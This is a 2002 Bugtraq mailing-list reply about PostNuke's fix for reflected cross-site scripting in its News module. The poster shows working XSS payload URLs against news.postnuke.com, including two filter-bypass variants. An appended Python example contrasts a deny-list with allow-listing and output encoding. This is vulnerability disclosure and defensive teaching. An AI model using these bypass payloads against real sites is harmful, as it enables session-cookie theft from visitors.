Bugtraq mailing list archives
Re: Postnuke XSS fixed
From: Daniel Woods <dwoods () ucalgary ca>
Date: Wed, 2 Oct 2002 10:09:33 -0600 (MDT)
Humm!

on 26th Sep the following url:

http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>

used to give Alert PopUp and Error:

DB Error: getArticles: 1064: You have an error in your SQL syntax near '=' at line 23

now it gives:

Sorry - $HTTP_GET_VARS contains javascript...

Prompt fix by PostNuke team, great work Keep it up! :)
Not so fast on the praise :(
It only took me a couple of workarounds to find ways to bypass the check.

http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>

Using the request...

?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>

gives me the DB Error: message

And using the request...

?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>

gives me the Alert Popup and DB Error: message... the '+' is treated as a blank.

Thanks... Dan.
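
Added example, not part of the original post and not PostNuke code: it runs the three `sid` values quoted above through a hypothetical deny-list (the post does not show how the real check works) and then through an allow-list plus output encoding. It assumes `sid` is meant to be a numeric article id; the function names are illustrative.

```python
import html
from urllib.parse import unquote_plus

# Constructed query strings carrying the three sid values quoted in the post.
BASE = "op=modload&name=News&file=article&sid="
REQUESTS = {
    "original": BASE + "<script>alert(document.cookie);</script>",
    "backslash": BASE + "<\\script>alert(document.cookie);</script>",
    "plus": BASE + "<script+>alert(document.cookie);</script>",
}


def get_sid(query):
    """Form-decode the sid parameter; '+' is decoded to a blank."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == "sid":
            return unquote_plus(value)
    return ""


def blacklist_allows(value):
    """Hypothetical deny-list (assumption): reject only the literal '<script>'."""
    return "<script>" not in value.lower()


def parse_sid(value):
    """Allow-list (assumes numeric ids): accept a short run of ASCII digits only."""
    if value.isascii() and value.isdigit() and len(value) <= 10:
        return int(value)
    return None


def render_error(value):
    """Encode on output so a reflected value is displayed as text, not markup."""
    return "No such article: " + html.escape(value, quote=True)


def report():
    """Return (deny-list passes, allow-list result, encoded error) per request."""
    rows = {}
    for name, query in REQUESTS.items():
        sid = get_sid(query)
        rows[name] = (blacklist_allows(sid), parse_sid(sid), render_error(sid))
    return rows


if __name__ == "__main__":
    for name, (passed, parsed, shown) in report().items():
        print(f"{name:9} deny-list passes={passed!s:5} allow-list={parsed} -> {shown}")
```

The deny-list stops only the first value, while the allow-list rejects all three and the encoded error text contains no live markup.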